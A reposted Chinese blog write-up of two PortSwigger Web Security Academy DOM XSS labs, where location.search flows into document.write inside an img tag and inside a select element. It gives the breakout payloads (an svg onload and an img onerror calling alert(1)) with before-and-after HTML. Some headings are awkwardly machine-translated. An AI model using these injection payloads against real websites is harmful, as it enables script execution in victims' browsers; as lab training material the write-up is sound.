portswigger靶场-Lab3、10

admin 2024年5月13日01:27:48评论9 views字数 1032阅读3分26秒阅读模式

Lab 3)数据交换系统 在…中document.write 潜水机使用源location.search(document.write在img中的payload

Lab 10)数据交换系统 在…中document.write 潜水机使用源location.search 在一个选择元素中document.write在select中的payload


portswigger靶场-Lab3、10靶场地址:https://portswigger.net/web-security

实验3:数据交换系统 在…中document.write 潜水机使用源location.search

1.构造payload进行弹窗

 ?"><svg onload=alert(1)>

(解析如下:

当这个SVG图像加载完成后,将触发JavaScript中的`alert(1)`,弹出一个包含数字1的警告框

输入payload 11111111时:

<img src="/resources/images/tracker.gif?searchTerms=111111111">


=>


<img src="/resources/images/tracker.gif?searchTerms="><svg onload=alert(1)>">

portswigger靶场-Lab3、10

实验10:数据交换系统 在…中document.write 潜水机使用源location.search 在一个选择元素中

1.构造payload进行弹窗

 "></select><img src="1" onerror="alert(1)">

(解析如下:

当这个img图像加载完成后,错误弹出一个包含数字1的警告框

输入payload 11111111时:

<select name="storeId">

<option selected="" >

<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">111111111111111</font>

</option>

</select>


=>


<select name="storeId">

<option selected="" >

<font style="vertical-align: inherit;">"></select>

<img src="1" onerror="alert(1)">

</font>

</option>

</select>

portswigger靶场-Lab3、10


原文始发于微信公众号(鲲哥的Bypass之旅):portswigger靶场-Lab3、10

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月13日01:27:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   portswigger靶场-Lab3、10https://cn-sec.com/archives/2496274.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息